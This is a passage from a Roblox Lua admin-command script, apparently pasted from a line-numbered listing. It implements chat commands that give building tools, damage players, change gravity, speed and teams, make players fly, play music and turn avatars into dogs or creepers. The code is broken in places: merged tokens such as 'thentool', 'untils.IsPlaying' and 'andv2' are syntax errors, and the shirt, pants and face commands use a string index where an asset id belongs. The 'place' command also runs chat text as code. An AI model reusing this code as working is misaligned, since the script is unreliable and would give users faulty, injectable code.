  1074. game.Lighting.FogEnd = msg:sub(8)
  1075. end
  1076.  
  1077. if msg:lower():sub(1,9) == "fogstart " then
  1078. game.Lighting.FogStart = msg:sub(10)
  1079. end
  1080.  
  1081. if msg:lower():sub(1,7) == "btools " then
  1082. local plrz = GetPlr(plr, msg:lower():sub(8))
  1083. for i, v in pairs(plrz) do
  1084. coroutine.resume(coroutine.create(function()
  1085. if v and v:findFirstChild("Backpack") then
  1086. local t1 = Instance.new("HopperBin", v.Backpack) t1.Name = "Move" t1.BinType = "GameTool"
  1087. local t2 = Instance.new("HopperBin", v.Backpack) t2.Name = "Clone" t2.BinType = "Clone"
  1088. local t3 = Instance.new("HopperBin", v.Backpack) t3.Name = "Delete" t3.BinType = "Hammer"
  1089. local t4= Instance.new("HopperBin", v.Backpack) t4.Name = "Resize"
  1090. local cl4 = script.LocalScriptBase:Clone() cl4.Parent = t4 cl4.Code.Value = [[
  1091. repeat wait() until game.Players.LocalPlayer and game.Players.LocalPlayer.Character and game.Players.LocalPlayer:findFirstChild("PlayerGui")
  1092. local sb
  1093. local hs
  1094. local pdist
  1095.  
  1096. script.Parent.Selected:connect(function(mouse)
  1097. if not mouse then return end
  1098. sb = Instance.new("SelectionBox", game.Players.LocalPlayer.PlayerGui) sb.Color = BrickColor.new("Bright blue") sb.Adornee = nil
  1099. hs = Instance.new("Handles", game.Players.LocalPlayer.PlayerGui) hs.Color = BrickColor.new("Bright blue") hs.Adornee = nil
  1100. mouse.Button1Down:connect(function() if not mouse.Target or mouse.Target.Locked then sb.Adornee = nil hs.Adornee = nil else sb.Adornee = mouse.Target hs.Adornee = mouse.Target hs.Faces = mouse.Target.ResizeableFaces end end)
  1101. hs.MouseDrag:connect(function(old,dist) if hs.Adornee and math.abs(dist-pdist) >= hs.Adornee.ResizeIncrement then if hs.Adornee:Resize(old, math.floor((dist-pdist)/ hs.Adornee.ResizeIncrement + .5) * hs.Adornee.ResizeIncrement) then pdist = dist end end end)
  1102. hs.MouseButton1Down:connect(function() pdist = 0 end)
  1103. end)
  1104.  
  1105. script.Parent.Deselected:connect(function() sb:Destroy() hs:Destroy() end)]] cl4.Disabled = false
  1106. end
  1107. end))
  1108. end
  1109. end
  1110.  
  1111. if msg:lower():sub(1,5) == "give " then
  1112. local chk1 = msg:lower():sub(6):find(" ") + 5
  1113. local plrz = GetPlr(plr, msg:lower():sub(6,chk1-1))
  1114. for i, v in pairs(plrz) do
  1115. coroutine.resume(coroutine.create(function()
  1116. if v and v:findFirstChild("Backpack") and game:findFirstChild("Lighting") then
  1117. for a, tool in pairs(game.Lighting:children()) do
  1118. if tool:IsA("Tool") or tool:IsA("HopperBin") then
  1119. if msg:lower():sub(chk1+1) == "all" or tool.Name:lower():find(msg:lower():sub(chk1+1)) == 1 thentool:Clone().Parent = v.Backpack end
  1120. end
  1121. end
  1122. end
  1123. end))
  1124. end
  1125. end
  1126.  
  1127. if msg:lower():sub(1,12) == "removetools " then
  1128. local plrz = GetPlr(plr, msg:lower():sub(13))
  1129. for i, v in pairs(plrz) do
  1130. coroutine.resume(coroutine.create(function()
  1131. if v and v.Character and v:findFirstChild("Backpack") then
  1132. for a, tool in pairs(v.Character:children()) do if tool:IsA("Tool") or tool:IsA("HopperBin") then tool:Destroy()end end
  1133. for a, tool in pairs(v.Backpack:children()) do if tool:IsA("Tool") or tool:IsA("HopperBin") then tool:Destroy()end end
  1134. end
  1135. end))
  1136. end
  1137. end
  1138.  
  1139. if msg:lower():sub(1,5) == "rank " then
  1140. local chk1 = msg:lower():sub(6):find(" ") + 5
  1141. local plrz = GetPlr(plr, msg:lower():sub(6,chk1-1))
  1142. for i, v in pairs(plrz) do
  1143. coroutine.resume(coroutine.create(function()
  1144. if v and v:IsInGroup(msg:sub(chk1+1)) then
  1145. Hint("[" .. v:GetRankInGroup(msg:sub(chk1+1)) .. "] " .. v:GetRoleInGroup(msg:sub(chk1+1)), {plr})
  1146. elseif v and not v:IsInGroup(msg:sub(chk1+1))then
  1147. Hint(v.Name .. " is not in the group " .. msg:sub(chk1+1), {plr})
  1148. end
  1149. end))
  1150. end
  1151. end
  1152.  
  1153. if msg:lower():sub(1,7) == "damage " then
  1154. local chk1 = msg:lower():sub(8):find(" ") + 7
  1155. local plrz = GetPlr(plr, msg:lower():sub(8,chk1-1))
  1156. for i, v in pairs(plrz) do
  1157. coroutine.resume(coroutine.create(function()
  1158. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1159. v.Character.Humanoid:TakeDamage(msg:sub(chk1+1))
  1160. end
  1161. end))
  1162. end
  1163. end
  1164.  
  1165. if msg:lower():sub(1,5) == "grav " then
  1166. local plrz = GetPlr(plr, msg:lower():sub(6))
  1167. for i, v in pairs(plrz) do
  1168. coroutine.resume(coroutine.create(function()
  1169. if v and v.Character and v.Character:findFirstChild("Torso") then
  1170. for a, frc in pairs(v.Character.Torso:children()) do if frc.Name == "BFRC" then frc:Destroy() end end
  1171. end
  1172. end))
  1173. end
  1174. end
  1175.  
  1176. if msg:lower():sub(1,8) == "setgrav " then
  1177. local chk1 = msg:lower():sub(9):find(" ") + 8
  1178. local plrz = GetPlr(plr, msg:lower():sub(9,chk1-1))
  1179. for i, v in pairs(plrz) do
  1180. coroutine.resume(coroutine.create(function()
  1181. if v and v.Character and v.Character:findFirstChild("Torso") then
  1182. for a, frc in pairs(v.Character.Torso:children()) do if frc.Name == "BFRC" then frc:Destroy() end end
  1183. local frc = Instance.new("BodyForce", v.Character.Torso) frc.Name = "BFRC" frc.force = Vector3.new(0,0,0)
  1184. for a, prt in pairs(v.Character:children()) do if prt:IsA("BasePart") then frc.force = frc.force -Vector3.new(0,prt:GetMass()*msg:sub(chk1+1),0) elseif prt:IsA("Hat") then frc.force = frc.force -Vector3.new(0,prt.Handle:GetMass()*msg:sub(chk1+1),0) end end
  1185. end
  1186. end))
  1187. end
  1188. end
  1189.  
  1190. if msg:lower():sub(1,7) == "nograv " then
  1191. local plrz = GetPlr(plr, msg:lower():sub(8))
  1192. for i, v in pairs(plrz) do
  1193. coroutine.resume(coroutine.create(function()
  1194. if v and v.Character and v.Character:findFirstChild("Torso") then
  1195. for a, frc in pairs(v.Character.Torso:children()) do if frc.Name == "BFRC" then frc:Destroy() end end
  1196. local frc = Instance.new("BodyForce", v.Character.Torso) frc.Name = "BFRC" frc.force = Vector3.new(0,0,0)
  1197. for a, prt in pairs(v.Character:children()) do if prt:IsA("BasePart") then frc.force = frc.force +Vector3.new(0,prt:GetMass()*196.25,0) elseif prt:IsA("Hat") then frc.force = frc.force +Vector3.new(0,prt.Handle:GetMass()*196.25,0) end end
  1198. end
  1199. end))
  1200. end
  1201. end
  1202.  
  1203. if msg:lower():sub(1,7) == "health " then
  1204. local chk1 = msg:lower():sub(8):find(" ") + 7
  1205. local plrz = GetPlr(plr, msg:lower():sub(8,chk1-1))
  1206. for i, v in pairs(plrz) do
  1207. coroutine.resume(coroutine.create(function()
  1208. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1209. v.Character.Humanoid.MaxHealth = msg:sub(chk1+1)
  1210. v.Character.Humanoid.Health = v.Character.Humanoid.MaxHealth
  1211. end
  1212. end))
  1213. end
  1214. end
  1215.  
  1216. if msg:lower():sub(1,6) == "speed " then
  1217. local chk1 = msg:lower():sub(7):find(" ") + 6
  1218. local plrz = GetPlr(plr, msg:lower():sub(7,chk1-1))
  1219. for i, v in pairs(plrz) do
  1220. coroutine.resume(coroutine.create(function()
  1221. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1222. v.Character.Humanoid.WalkSpeed = msg:sub(chk1+1)
  1223. end
  1224. end))
  1225. end
  1226. end
  1227.  
  1228. if msg:lower():sub(1,5) == "team " then
  1229. local chk1 = msg:lower():sub(6):find(" ") + 5
  1230. local plrz = GetPlr(plr, msg:lower():sub(6,chk1-1))
  1231. for i, v in pairs(plrz) do
  1232. coroutine.resume(coroutine.create(function()
  1233. if v and game:findFirstChild("Teams") then
  1234. for a, tm in pairs(game.Teams:children()) do
  1235. if tm.Name:lower():find(msg:lower():sub(chk1+1)) == 1 then v.TeamColor = tm.TeamColor end
  1236. end
  1237. end
  1238. end))
  1239. end
  1240. end
  1241.  
  1242. if msg:lower():sub(1,6) == "place " then
  1243. local chk1 = msg:lower():sub(7):find(" ") + 6
  1244. local plrz = GetPlr(plr, msg:lower():sub(7,chk1-1))
  1245. for i, v in pairs(plrz) do
  1246. coroutine.resume(coroutine.create(function()
  1247. if v and v:findFirstChild("PlayerGui") then
  1248. local cl = script.LocalScriptBase:Clone() cl.Code.Value = [[game:service("TeleportService"):Teleport(]] ..msg:sub(chk1+1) .. ")" cl.Parent = v.PlayerGui cl.Disabled = false
  1249. end
  1250. end))
  1251. end
  1252. end
  1253.  
  1254. if msg:lower():sub(1,3) == "tp " then
  1255. local chk1 = msg:lower():sub(4):find(" ") + 3
  1256. local plrz = GetPlr(plr, msg:lower():sub(4,chk1-1))
  1257. local plrz2 = GetPlr(plr, msg:lower():sub(chk1+1))
  1258. for i, v in pairs(plrz) do
  1259. coroutine.resume(coroutine.create(function()
  1260. for i2, v2 in pairs(plrz2) do
  1261. if v and v2 and v.Character and v2.Character and v.Character:findFirstChild("Torso") andv2.Character:findFirstChild("Torso") then
  1262. v.Character.Torso.CFrame = v2.Character.Torso.CFrame + Vector3.new(math.random(-1,1),0,math.random(-1,1))
  1263. end
  1264. end
  1265. end))
  1266. end
  1267. end
  1268.  
  1269. if msg:lower():sub(1,7) == "change " then
  1270. local chk1 = msg:lower():sub(8):find(" ") + 7
  1271. local chk2 = msg:sub(chk1+1):find(" ") + chk1
  1272. local plrz = GetPlr(plr, msg:lower():sub(8,chk1-1))
  1273. for i, v in pairs(plrz) do
  1274. coroutine.resume(coroutine.create(function()
  1275. if v and v:findFirstChild("leaderstats") then
  1276. for a, st in pairs(v.leaderstats:children()) do
  1277. if st.Name:lower():find(msg:sub(chk1+1,chk2-1)) == 1 then st.Value = msg:sub(chk2+1) end
  1278. end
  1279. end
  1280. end))
  1281. end
  1282. end
  1283.  
  1284. if msg:lower():sub(1,6) == "shirt " then
  1285. local chk1 = msg:lower():sub(7):find(" ") + 6
  1286. local plrz = GetPlr(plr, msg:lower():sub(7,chk1-1))
  1287. for i, v in pairs(plrz) do
  1288. coroutine.resume(coroutine.create(function()
  1289. if v and v.Character then
  1290. for i,v in pairs(v.Character:children()) do
  1291. if v:IsA("Shirt") then local cl = v:Clone() cl.Parent = v.Parent cl.ShirtTemplate = "http://www.roblox.com/asset/?id=" .. chk1 v:Destroy() end
  1292. end
  1293. end
  1294. end))
  1295. end
  1296. end
  1297.  
  1298. if msg:lower():sub(1,6) == "pants " then
  1299. local chk1 = msg:lower():sub(7):find(" ") + 6
  1300. local plrz = GetPlr(plr, msg:lower():sub(7,chk1-1))
  1301. for i, v in pairs(plrz) do
  1302. coroutine.resume(coroutine.create(function()
  1303. if v and v.Character then
  1304. for i,v in pairs(v.Character:children()) do
  1305. if v:IsA("Pants") then local cl = v:Clone() cl.Parent = v.Parent cl.PantsTemplate = "http://www.roblox.com/asset/?id=" .. chk1 v:Destroy() end
  1306. end
  1307. end
  1308. end))
  1309. end
  1310. end
  1311.  
  1312. if msg:lower():sub(1,5) == "face " then
  1313. local chk1 = msg:lower():sub(6):find(" ") + 5
  1314. local plrz = GetPlr(plr, msg:lower():sub(6,chk1-1))
  1315. for i, v in pairs(plrz) do
  1316. coroutine.resume(coroutine.create(function()
  1317. if v and v.Character and v.Character:findFirstChild("Head") and v.Character.Head:findFirstChild("face") then
  1318. v.Character.Head:findFirstChild("face").Texture = "http://www.roblox.com/asset/?id=" .. chk1
  1319. end
  1320. end))
  1321. end
  1322. end
  1323.  
  1324. ------------------
  1325. -- Fun Commands --
  1326. ------------------
  1327. if FunCommands or plr.userId == game.CreatorId or ChkOwner(plr.Name:lower()) then
  1328.  
  1329. if msg:lower():sub(1,8) == "swagify " then
  1330. local plrz = GetPlr(plr, msg:lower():sub(9))
  1331. for i, v in pairs(plrz) do
  1332. coroutine.resume(coroutine.create(function()
  1333. if v and v.Character then
  1334. for i,v in pairs(v.Character:children()) do
  1335. if v.Name == "Shirt" then local cl = v:Clone() cl.Parent = v.Parent cl.ShirtTemplate ="http://www.roblox.com/asset/?id=109163376" v:Destroy() end
  1336. if v.Name == "Pants" then local cl = v:Clone() cl.Parent = v.Parent cl.PantsTemplate ="http://www.roblox.com/asset/?id=109163376" v:Destroy() end
  1337. end
  1338. for a,cp in pairs(v.Character:children()) do if cp.Name == "EpicCape" then cp:Destroy() end end
  1339. local cl = script.LocalScriptBase:Clone() cl.Name = "CapeScript" cl.Code.Value = [[local plr = game.Players.LocalPlayer
  1340. repeat wait() until plr and plr.Character and plr.Character:findFirstChild("Torso")
  1341. local torso = plr.Character.Torso
  1342. local p = Instance.new("Part", torso.Parent) p.Name = "EpicCape" p.Anchored = false
  1343. p.CanCollide = false p.TopSurface = 0 p.BottomSurface = 0 p.BrickColor = BrickColor.new("Pink") local dec = Instance.new("Decal", p) dec.Face = 2 dec.Texture = "http://www.roblox.com/asset/?id=109301474" p.formFactor = "Custom"
  1344. p.Size = Vector3.new(.2,.2,.2)
  1345. local msh = Instance.new("BlockMesh", p) msh.Scale = Vector3.new(9,17.5,.5)
  1346. local motor1 = Instance.new("Motor", p)
  1347. motor1.Part0 = p
  1348. motor1.Part1 = torso
  1349. motor1.MaxVelocity = .01
  1350. motor1.C0 = CFrame.new(0,1.75,0)*CFrame.Angles(0,math.rad(90),0)
  1351. motor1.C1 = CFrame.new(0,1,.45)*CFrame.Angles(0,math.rad(90),0)
  1352. local wave = false
  1353. repeat wait(1/44)
  1354. local ang = 0.1
  1355. local oldmag = torso.Velocity.magnitude
  1356. local mv = .002
  1357. if wave then ang = ang + ((torso.Velocity.magnitude/10)*.05)+.05 wave = false else wave = true end
  1358. ang = ang + math.min(torso.Velocity.magnitude/11, .5)
  1359. motor1.MaxVelocity = math.min((torso.Velocity.magnitude/111), .04) + mv
  1360. motor1.DesiredAngle = -ang
  1361. if motor1.CurrentAngle < -.2 and motor1.DesiredAngle > -.2 then motor1.MaxVelocity = .04 end
  1362. repeat wait() until motor1.CurrentAngle == motor1.DesiredAngle or math.abs(torso.Velocity.magnitude - oldmag) >= (torso.Velocity.magnitude/10) + 1
  1363. if torso.Velocity.magnitude < .1 then wait(.1) end
  1364. until not p or p.Parent ~= torso.Parent
  1365. script:Destroy()
  1366. ]] cl.Parent = v.PlayerGui cl.Disabled = false
  1367. end
  1368. end))
  1369. end
  1370. end
  1371.  
  1372. if msg:lower():sub(1,6) == "music " then
  1373. for i, v in pairs(game.Workspace:children()) do if v:IsA("Sound") then v:Destroy() end end
  1374. local id = msg:sub(7)
  1375. local pitch = 1
  1376. if tostring(id):lower():find("caramell") then id = 2303479 end
  1377. if tostring(id):find("epic") then id = 27697743 pitch = 2.5 end
  1378. if tostring(id):find("rick") then id = 2027611 end
  1379. if tostring(id):find("halo") then id = 1034065 end
  1380. if tostring(id):find("pokemon") then id = 1372261 end
  1381. if tostring(id):find("cursed") then id = 1372257 end
  1382. if tostring(id):find("extreme") then id = 11420933 end
  1383. if tostring(id):find("awaken") then id = 27697277 end
  1384. if tostring(id):find("alone") then id = 27697392 end
  1385. if tostring(id):find("mario") then id = 1280470 end
  1386. if tostring(id):find("choir") then id = 1372258 end
  1387. if tostring(id):find("chrono") then id = 1280463 end
  1388. if tostring(id):find("dotr") then id = 11420922 end
  1389. if tostring(id):find("entertain") then id = 27697267 end
  1390. if tostring(id):find("fantasy") then id = 1280473 end
  1391. if tostring(id):find("final") then id = 1280414 end
  1392. if tostring(id):find("emblem") then id = 1372259 end
  1393. if tostring(id):find("flight") then id = 27697719 end
  1394. if tostring(id):find("banjo") then id = 27697298 end
  1395. if tostring(id):find("gothic") then id = 27697743 end
  1396. if tostring(id):find("hiphop") then id = 27697735 end
  1397. if tostring(id):find("intro") then id = 27697707 end
  1398. if tostring(id):find("mule") then id = 1077604 end
  1399. if tostring(id):find("film") then id = 27697713 end
  1400. if tostring(id):find("nezz") then id = 8610025 end
  1401. if tostring(id):find("angel") then id = 1372260 end
  1402. if tostring(id):find("resist") then id = 27697234 end
  1403. if tostring(id):find("schala") then id = 5985787 end
  1404. if tostring(id):find("organ") then id = 11231513 end
  1405. if tostring(id):find("tunnel") then id = 9650822 end
  1406. if tostring(id):find("spanish") then id = 5982975 end
  1407. if tostring(id):find("venom") then id = 1372262 end
  1408. if tostring(id):find("wind") then id = 1015394 end
  1409. if tostring(id):find("guitar") then id = 5986151 end
  1410. local s = Instance.new("Sound", game.Workspace) s.SoundId = "http://www.roblox.com/asset/?id=" .. id s.Volume = 1s.Pitch = pitch s.Looped = true s.archivable = false repeat s:Play() wait(2.5) s:Stop() wait(.5) s:Play() untils.IsPlaying
  1411. end
  1412.  
  1413. if msg:lower() == "stopmusic" then
  1414. for i, v in pairs(game.Workspace:children()) do if v:IsA("Sound") then v:Destroy() end end
  1415. end
  1416.  
  1417. if msg:lower() == "musiclist" then
  1418. if plr.PlayerGui:findFirstChild("MUSICGUI") then return end
  1419. local scr, cmf, ent, num = ScrollGui() scr.Name = "MUSICGUI" scr.Parent = plr.PlayerGui
  1420. local list ={"caramell","epic","rick","halo","pokemon","cursed","extreme","awaken","alone","mario","choir","chrono","dotr","entertain","fantasy","final","emblem","flight","banjo","gothic","hiphop","intro","mule","film","nezz","angel","resist","schala","organ","tunnel","spanish","venom","wind","guitar"}
  1421. for i, v in pairs(list) do local cl = ent:Clone() cl.Parent = cmf cl.Text = v cl.Position =UDim2.new(0,0,0,num*20) num = num +1 end
  1422. end
  1423.  
  1424. if msg:lower():sub(1,4) == "fly " then
  1425. local plrz = GetPlr(plr, msg:lower():sub(5))
  1426. for i, v in pairs(plrz) do
  1427. coroutine.resume(coroutine.create(function()
  1428. if v and v:findFirstChild("PlayerGui") then
  1429. local cl = script.LocalScriptBase:Clone() cl.Name = "FlyScript" cl.Code.Value = [[repeat wait() until game.Players.LocalPlayer and game.Players.LocalPlayer.Character and game.Players.LocalPlayer.Character:findFirstChild("Torso") and game.Players.LocalPlayer.Character:findFirstChild("Humanoid") local mouse = game.Players.LocalPlayer:GetMouse() repeat wait() until mouse ~= nil local plr = game.Players.LocalPlayer local torso = plr.Character.Torso local flying = false local deb = true local ctrl = {f = 0, b = 0, l = 0, r = 0} local lastctrl = {f = 0, b = 0, l = 0, r = 0} local maxspeed = 50 local speed = 0 function Fly() local bg = Instance.new("BodyGyro", torso) bg.P = 9e4 bg.maxTorque = Vector3.new(9e9, 9e9, 9e9) bg.cframe = torso.CFrame local bv = Instance.new("BodyVelocity", torso) bv.velocity = Vector3.new(0,0.1,0) bv.maxForce = Vector3.new(9e9, 9e9, 9e9) repeat wait() plr.Character.Humanoid.PlatformStand = true if ctrl.l + ctrl.r ~= 0 or ctrl.f + ctrl.b ~= 0 then speed = speed+.5+(speed/maxspeed) if speed > maxspeed then speed = maxspeed end elseif not (ctrl.l + ctrl.r ~= 0 or ctrl.f + ctrl.b ~= 0) and speed ~= 0 then speed = speed-1 if speed < 0 then speed = 0 end end if (ctrl.l + ctrl.r) ~= 0 or (ctrl.f + ctrl.b) ~= 0 then bv.velocity = ((game.Workspace.CurrentCamera.CoordinateFrame.lookVector * (ctrl.f+ctrl.b)) + ((game.Workspace.CurrentCamera.CoordinateFrame * CFrame.new(ctrl.l+ctrl.r,(ctrl.f+ctrl.b)*.2,0).p) - game.Workspace.CurrentCamera.CoordinateFrame.p))*speed lastctrl = {f = ctrl.f, b = ctrl.b, l = ctrl.l, r = ctrl.r} elseif (ctrl.l + ctrl.r) == 0 and (ctrl.f + ctrl.b) == 0 and speed ~= 0 then bv.velocity = ((game.Workspace.CurrentCamera.CoordinateFrame.lookVector * (lastctrl.f+lastctrl.b)) + ((game.Workspace.CurrentCamera.CoordinateFrame * CFrame.new(lastctrl.l+lastctrl.r,(lastctrl.f+lastctrl.b)*.2,0).p) - game.Workspace.CurrentCamera.CoordinateFrame.p))*speed else bv.velocity = Vector3.new(0,0.1,0) end bg.cframe = game.Workspace.CurrentCamera.CoordinateFrame * CFrame.Angles(-math.rad((ctrl.f+ctrl.b)*50*speed/maxspeed),0,0) until not flying ctrl = {f = 0, b = 0, l = 0, r = 0} lastctrl = {f = 0, b = 0, l = 0, r = 0} speed = 0 bg:Destroy() bv:Destroy() plr.Character.Humanoid.PlatformStand = false end mouse.KeyDown:connect(function(key) if key:lower() == "e" then if flying then flying = false else flying = true Fly() end elseif key:lower() == "w" then ctrl.f = 1 elseif key:lower() == "s" then ctrl.b = -1 elseif key:lower() == "a" then ctrl.l = -1 elseif key:lower() == "d" then ctrl.r = 1 end end) mouse.KeyUp:connect(function(key) if key:lower() == "w" then ctrl.f = 0 elseif key:lower() == "s" then ctrl.b = 0 elseif key:lower() == "a" then ctrl.l = 0 elseif key:lower() == "d" then ctrl.r = 0 end end)]]
  1430. cl.Parent = v.PlayerGui cl.Disabled = false
  1431. end
  1432. end))
  1433. end
  1434. end
  1435.  
  1436. if msg:lower():sub(1,6) == "unfly " then
  1437. local plrz = GetPlr(plr, msg:lower():sub(7))
  1438. for i, v in pairs(plrz) do
  1439. coroutine.resume(coroutine.create(function()
  1440. if v and v:findFirstChild("PlayerGui") and v.Character and v.Character:findFirstChild("Torso") andv.Character:findFirstChild("Humanoid") then
  1441. for a, q in pairs(v.PlayerGui:children()) do if q.Name == "FlyScript" then q:Destroy() end end
  1442. for a, q in pairs(v.Character.Torso:children()) do if q.Name == "BodyGyro" or q.Name == "BodyVelocity" thenq:Destroy() end end
  1443. wait(.1) v.Character.Humanoid.PlatformStand = false
  1444. end
  1445. end))
  1446. end
  1447. end
  1448.  
  1449. if msg:lower() == "disco" then
  1450. for i, v in pairs(lobjs) do v:Destroy() end
  1451. local cl = script.ScriptBase:Clone() cl.Name = "LightEdit" cl.Code.Value = [[repeat wait(.1) local color = Color3.new(math.random(255)/255,math.random(255)/255,math.random(255)/255)
  1452. game.Lighting.Ambient = color
  1453. game.Lighting.FogColor = color
  1454. until nil]]
  1455. table.insert(lobjs, cl) cl.Parent = game.Workspace cl.Disabled = false
  1456. end
  1457.  
  1458. if msg:lower() == "flash" then
  1459. for i, v in pairs(lobjs) do v:Destroy() end
  1460. local cl = script.ScriptBase:Clone() cl.Name = "LightEdit" cl.Code.Value = [[repeat wait(.1)
  1461. game.Lighting.Ambient = Color3.new(1,1,1)
  1462. game.Lighting.FogColor = Color3.new(1,1,1)
  1463. game.Lighting.Brightness = 1
  1464. game.Lighting.TimeOfDay = 14
  1465. wait(.1)
  1466. game.Lighting.Ambient = Color3.new(0,0,0)
  1467. game.Lighting.FogColor = Color3.new(0,0,0)
  1468. game.Lighting.Brightness = 0
  1469. game.Lighting.TimeOfDay = 0
  1470. until nil]]
  1471. table.insert(lobjs, cl) cl.Parent = game.Workspace cl.Disabled = false
  1472. end
  1473.  
  1474. if msg:lower():sub(1,5) == "spin " then
  1475. local plrz = GetPlr(plr, msg:lower():sub(6))
  1476. for i, v in pairs(plrz) do
  1477. coroutine.resume(coroutine.create(function()
  1478. if v and v.Character and v.Character:findFirstChild("Torso") then
  1479. for i,v in pairs(v.Character.Torso:children()) do if v.Name == "SPINNER" then v:Destroy() end end
  1480. local torso = v.Character:findFirstChild("Torso")
  1481. local bg = Instance.new("BodyGyro", torso) bg.Name = "SPINNER" bg.maxTorque = Vector3.new(0,math.huge,0) bg.P =11111 bg.cframe = torso.CFrame table.insert(objects,bg)
  1482. repeat wait(1/44) bg.cframe = bg.cframe * CFrame.Angles(0,math.rad(30),0)
  1483. until not bg or bg.Parent ~= torso
  1484. end
  1485. end))
  1486. end
  1487. end
  1488.  
  1489. if msg:lower():sub(1,7) == "unspin " then
  1490. local plrz = GetPlr(plr, msg:lower():sub(8))
  1491. for i, v in pairs(plrz) do
  1492. coroutine.resume(coroutine.create(function()
  1493. if v and v.Character and v.Character:findFirstChild("Torso") then
  1494. for a,q in pairs(v.Character.Torso:children()) do if q.Name == "SPINNER" then q:Destroy() end end
  1495. end
  1496. end))
  1497. end
  1498. end
  1499.  
  1500. if msg:lower():sub(1,4) == "dog " then
  1501. local plrz = GetPlr(plr, msg:lower():sub(5))
  1502. for i, v in pairs(plrz) do
  1503. coroutine.resume(coroutine.create(function()
  1504. if v and v.Character and v.Character:findFirstChild("Torso") then
  1505. if v.Character:findFirstChild("Shirt") then v.Character.Shirt.Parent = v.Character.Torso end
  1506. if v.Character:findFirstChild("Pants") then v.Character.Pants.Parent = v.Character.Torso end
  1507. v.Character.Torso.Transparency = 1
  1508. v.Character.Torso.Neck.C0 = CFrame.new(0,-.5,-2) * CFrame.Angles(math.rad(90),math.rad(180),0)
  1509. v.Character.Torso["Right Shoulder"].C0 = CFrame.new(.5,-1.5,-1.5) * CFrame.Angles(0,math.rad(90),0)
  1510. v.Character.Torso["Left Shoulder"].C0 = CFrame.new(-.5,-1.5,-1.5) * CFrame.Angles(0,math.rad(-90),0)
  1511. v.Character.Torso["Right Hip"].C0 = CFrame.new(1.5,-1,1.5) * CFrame.Angles(0,math.rad(90),0)
  1512. v.Character.Torso["Left Hip"].C0 = CFrame.new(-1.5,-1,1.5) * CFrame.Angles(0,math.rad(-90),0)
  1513. local new = Instance.new("Seat", v.Character) new.Name = "FAKETORSO" new.formFactor = "Symmetric" new.TopSurface =0 new.BottomSurface = 0 new.Size = Vector3.new(3,1,4) new.CFrame = v.Character.Torso.CFrame
  1514. local bf = Instance.new("BodyForce", new) bf.force = Vector3.new(0,new:GetMass()*196.25,0)
  1515. local weld = Instance.new("Weld", v.Character.Torso) weld.Part0 = v.Character.Torso weld.Part1 = new weld.C0 =CFrame.new(0,-.5,0)
  1516. for a, part in pairs(v.Character:children()) do if part:IsA("BasePart") then part.BrickColor =BrickColor.new("Brown") elseif part:findFirstChild("NameTag") then part.Head.BrickColor = BrickColor.new("Brown")end end
  1517. end
  1518. end))
  1519. end
  1520. end
  1521.  
  1522. if msg:lower():sub(1,6) == "undog " then
  1523. local plrz = GetPlr(plr, msg:lower():sub(7))
  1524. for i, v in pairs(plrz) do
  1525. coroutine.resume(coroutine.create(function()
  1526. if v and v.Character and v.Character:findFirstChild("Torso") then
  1527. if v.Character.Torso:findFirstChild("Shirt") then v.Character.Torso.Shirt.Parent = v.Character end
  1528. if v.Character.Torso:findFirstChild("Pants") then v.Character.Torso.Pants.Parent = v.Character end
  1529. v.Character.Torso.Transparency = 0
  1530. v.Character.Torso.Neck.C0 = CFrame.new(0,1,0) * CFrame.Angles(math.rad(90),math.rad(180),0)
  1531. v.Character.Torso["Right Shoulder"].C0 = CFrame.new(1,.5,0) * CFrame.Angles(0,math.rad(90),0)
  1532. v.Character.Torso["Left Shoulder"].C0 = CFrame.new(-1,.5,0) * CFrame.Angles(0,math.rad(-90),0)
  1533. v.Character.Torso["Right Hip"].C0 = CFrame.new(1,-1,0) * CFrame.Angles(0,math.rad(90),0)
  1534. v.Character.Torso["Left Hip"].C0 = CFrame.new(-1,-1,0) * CFrame.Angles(0,math.rad(-90),0)
  1535. for a, part in pairs(v.Character:children()) do if part:IsA("BasePart") then part.BrickColor =BrickColor.new("White") if part.Name == "FAKETORSO" then part:Destroy() end elseif part:findFirstChild("NameTag")then part.Head.BrickColor = BrickColor.new("White") end end
  1536. end
  1537. end))
  1538. end
  1539. end
  1540.  
  1541. if msg:lower():sub(1,8) == "creeper " then
  1542. local plrz = GetPlr(plr, msg:lower():sub(9))
  1543. for i, v in pairs(plrz) do
  1544. coroutine.resume(coroutine.create(function()
  1545. if v and v.Character and v.Character:findFirstChild("Torso") then
  1546. if v.Character:findFirstChild("Shirt") then v.Character.Shirt.Parent = v.Character.Torso end
  1547. if v.Character:findFirstChild("Pants") then v.Character.Pants.Parent = v.Character.Torso end
  1548. v.Character.Torso.Transparency = 0
  1549. v.Character.Torso.Neck.C0 = CFrame.new(0,1,0) * CFrame.Angles(math.rad(90),math.rad(180),0)
  1550. v.Character.Torso["Right Shoulder"].C0 = CFrame.new(0,-1.5,-.5) * CFrame.Angles(0,math.rad(90),0)
  1551. v.Character.Torso["Left Shoulder"].C0 = CFrame.new(0,-1.5,-.5) * CFrame.Angles(0,math.rad(-90),0)
  1552. v.Character.Torso["Right Hip"].C0 = CFrame.new(0,-1,.5) * CFrame.Angles(0,math.rad(90),0)
  1553. v.Character.Torso["Left Hip"].C0 = CFrame.new(0,-1,.5) * CFrame.Angles(0,math.rad(-90),0)
  1554. for a, part in pairs(v.Character:children()) do if part:IsA("BasePart") then part.BrickColor =BrickColor.new("Bright green") if part.Name == "FAKETORSO" then part:Destroy() end elseifpart:findFirstChild("NameTag") then part.Head.BrickColor = BrickColor.new("Bright green") end end
  1555. end
  1556. end))
  1557. end
  1558. end
  1559.  
  1560. if msg:lower():sub(1,10) == "uncreeper " then
  1561. local plrz = GetPlr(plr, msg:lower():sub(11))
  1562. for i, v in pairs(plrz) do
  1563. coroutine.resume(coroutine.create(function()
  1564. if v and v.Character and v.Character:findFirstChild("Torso") then
  1565. if v.Character.Torso:findFirstChild("Shirt") then v.Character.Torso.Shirt.Parent = v.Character end
  1566. if v.Character.Torso:findFirstChild("Pants") then v.Character.Torso.Pants.Parent = v.Character end
  1567. v.Character.Torso.Transparency = 0
  1568. v.Character.Torso.Neck.C0 = CFrame.new(0,1,0) * CFrame.Angles(math.rad(90),math.rad(180),0)
  1569. v.Character.Torso["Right Shoulder"].C0 = CFrame.new(1,.5,0) * CFrame.Angles(0,math.rad(90),0)
  1570. v.Character.Torso["Left Shoulder"].C0 = CFrame.new(-1,.5,0) * CFrame.Angles(0,math.rad(-90),0)
